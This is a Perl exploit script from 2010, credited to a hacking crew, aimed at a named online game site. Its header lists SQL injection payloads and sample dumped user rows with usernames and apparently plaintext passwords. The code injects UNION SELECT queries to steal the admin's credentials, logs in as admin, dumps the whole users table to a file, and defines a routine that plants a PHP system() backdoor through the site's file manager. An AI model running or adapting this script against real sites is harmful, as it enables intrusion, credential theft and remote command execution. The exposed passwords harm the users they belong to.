#!/usr/bin/perl
=Informations
NinjaGame.eu Remote SQL Injection & Dump User Table Exploit By Dante90
Coded By Dante90, WaRWolFz Crew
Bug Discovered By: baser
Web Site: http://www.warwolfz.org/

Bugs and some informations:
http://www.ninjagame.eu/sfida_giornaliera1.php?avv=-1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),table_name,column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 FROM information_schema.COLUMNS LIMIT 260,1--
iscritti : id_iscritto
iscritti : username
iscritti : password
iscritti : email

http://www.ninjagame.eu/sfida_giornaliera1.php?avv=-1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),id_iscritto,username,password,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 FROM iscritti WHERE id_iscritto = 5--
1 : gatsu : cikdavabpi48 : [email protected]
2 : bearwolf : spillaluna : [email protected]
3 : agaa : alessio95x3 : [email protected]
4 : PeppePatti : cheguevara : [email protected]
5 : cri33 : manfro : [email protected]

http://www.ninjagame.eu/migliora_tecniche.php?tipomossa=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM iscritti--&Submit=Filtra

=cut

use strict;
use HTTP::Request::Common;
use LWP::UserAgent;
use HTTP::Cookies;
require HTTP::Headers;
use IO::Socket;

my ($UserName,$PassWord,$ID) = @ARGV;
if(@ARGV < 3){
	&usage();
	exit();
}

#START - Define Variables
	my $Message = "";
	my $Host = "http://www.ninjagame.eu/"; #Insert Victime Web Site Link
	my $BackDoor = "./inc/languages/english.php?WaRWolFz=php_info();"; #BackDoored File
	my $Code = "\n\nif(isset(\$_GET['WaRWolFz']))\n\tsystem(\$_GET['WaRWolFz'])"; #Backdoor Code
	my $Referrer = "http://www.warwolfz.com/";
	my $Method = HTTP::Request->new(GET => $Host);
	my $Cookies = new HTTP::Cookies;
	my $HTTP = new LWP::UserAgent(
				agent => 'Mozilla/5.0',
				max_redirect => 0,
				cookie_jar => $Cookies,
			) or die $!;
	my $Headers = HTTP::Headers->new;
#END - Define Variables

sub Clear(){
	my $launch = $^O eq 'MSWin32' ? 'cls' : 'clear';
	return system($launch);
}

sub Login_UserCP(){
	my $Login = $HTTP->post($Host.'index.php',
				[
					user		=> $UserName,
					pass		=> $PassWord,
					login		=> 'login',
					''			=> 'Login',
				]) || die $!;

	if($Login->content =~ /TIMER DEL TUO PERSONAGGIO/i){
		return 1;
	}else{
		return 0;
	}
}

sub Login_AdminCP{
	my ($UserAdmin,$PassAdmin) = @_;
	my $Login = $HTTP->post($Host.'index.php',
				[
					user		=> $UserAdmin,
					pass		=> $PassAdmin,
					login		=> 'login',
					''			=> 'Login',
				]) || die $!;

	if($Login->content =~ /TIMER DEL TUO PERSONAGGIO/i){
		return 1;
	}else{
		return 0;
	}
}

sub SQL_Injection{
	return "./sfida_giornaliera1.php?avv=-1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),id_iscritto,username,password,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 FROM iscritti WHERE id_iscritto = ${ID}--";
}

sub Users_Dumping{
	my $ID_Iscritto = shift;
	return "./sfida_giornaliera1.php?avv=-1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),id_iscritto,username,password,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 FROM iscritti WHERE id_iscritto = ${ID_Iscritto}--";
}

sub Num{
	return "./sfida_giornaliera1.php?avv=-1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),id_iscritto,username,password,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 FROM iscritti WHERE id_iscritto >= 0--";
}

sub Remote_Command_Execution(){
	my $Login = $HTTP->post($Host.'cp.php?action=filemgr',
				[
					"savefile"		=> 'index.php',
					"pathext"		=> 'images/',
					"new"			=> $Code,
					"save"			=> 'Conferma le  modifiche'
					#"cancel"		=> 'Cancel or Back'
				]) || die $!;
	if($Login->content =~ /(avatars | common | os_browsers)/i){
		return 1;
	}else{
		return 0;
	}
}

sub HTTP_Request(){
	$Referrer = $_[0];
	$Method->referrer($Referrer);
	my $Response = $HTTP->request($Method);
	return $Response->is_success() or die "$Host : ", $Response->message,"\n";
}

sub usage{
	Clear();
	{
		print " \n NinjaGame.eu Remote SQL Injection & Dump User Table Exploit By Dante90\n";
		print " ------------------------------------------------------ \n";
		print " * USAGE:                                             *\n";
		print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
		print " * perl name_exploit.pl [username] [password] [id]    *\n";
		print " ------------------------------------------------------ \n";
		print " *         Powered By Dante90, WaRWolFz Crew          *\n";
		print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
		print " ------------------------------------------------------ \n";
	};
	exit;
}

sub Refresh{
	Clear();
	{
		print " \n NinjaGame.eu Remote SQL Injection & Dump User Table Exploit By Dante90\n";
		print " ------------------------------------------------------ \n";
		print " * USAGE:                                             *\n";
		print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
		print " * perl name_exploit.pl [username] [password] [id]    *\n";
		print " ------------------------------------------------------ \n";
		print " *         Powered By Dante90, WaRWolFz Crew          *\n";
		print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
		print " ------------------------------------------------------ \n";
	};
	print " * Victime Site: " . $_[0] . "\n";
	print $_[1] ."\n";
}

sub Failed{
	Clear();
	Refresh($Host, $Message);
	print " * Exploit Failed                                     *\n";
	print " ------------------------------------------------------ \n";
	exit;
}

sub Main(){
	Clear();
	my ($AdminUser,$AdminPass);
	#START - Login
	if (Login_UserCP() == 1){
		$Message = " * Logged in as: ".$UserName." (UserCP)\n".
					" * Trying to retreive admin level..\n";
	}elsif (Login_UserCP() == 0){
		$Message = " * Login Failed.\n";
		Failed($Host, $Message);
	}
	Refresh($Host, $Message);
	#END - Login
	my $Get = $HTTP->get($Host.SQL_Injection());
	if($Get->content =~ /([0-9]{1,10}) : ([a-zA-Z0-9-_.]{2,200}) : ([a-zA-Z0-9-_.]{1,40}) : ([[email protected]]{1,50})/i){
		$AdminUser = $2;
		$AdminPass = $3;
		$Message .= " * ID: ".$1."\n * Admin Username: ".$2."\n * Admin Password: ".$3."\n * E-Mail: ".$4."\n";
	}else{
		$Message .= "n/a\n * Failed.";
		Failed($Host, $Message);
	}
	Refresh($Host, $Message);
	$Message .= " * Done.\n * Trying to login with admin rights..\n";
	Refresh($Host, $Message);
	if (Login_AdminCP($AdminUser,$AdminPass) == 1){
		$Message .= " * Logged in as: ".$AdminUser." (AdminCP)\n".
					" * Jakpot! You are admin!";
	}elsif (Login_AdminCP($AdminUser,$AdminPass) == 0){
		$Message .= " * Administration Login Failed.";
		Failed($Host, $Message);
	}
	$Message .= "\n * Trying to dumping users table..";
	Refresh($Host, $Message);
	my $Num;
	open (FILE, ">dump_users_ninjagame.eu.html") || die ("");
	$Get = $HTTP->get($Host.Num());
	if($Get->content =~ /([0-9]{1,10}) : ([a-zA-Z0-9-_.]{2,200}) : ([a-zA-Z0-9-_.]{1,40})/i){
		$Num = $1;
	}
	if($Num != ""){
		$Message .= "\n * Dumping..";
	}else{
		$Message .= "\n * Dumping Failed.";
		Failed($Host, $Message);
	}
	Refresh($Host, $Message);
	my $data = "";
	for(my $I=0; $I<=$Num; $I++){
		$Get = $HTTP->get($Host."./sfida_giornaliera1.php?avv=-1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),id_iscritto,username,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 FROM iscritti WHERE id_iscritto = ".$I."--");
		if($Get->content =~ /([0-9]{1,10}) : ([a-zA-Z0-9-_.]{2,200}) : ([a-zA-Z0-9-_.]{1,40})/i){
			$data .= $1." : ".$2." : ".$3."\n";
		}
	}
	print FILE $data;
	close (FILE);
	$Message .= "\n * DUMPED.";
	Refresh($Host, $Message);
	print " * Exploit Successfully Executed                      *\n";
	print " ------------------------------------------------------\n ";
	system("pause");
	exit;
}

Main();

#WaRWolFz Crew


#WaRWolFz 2010.05.12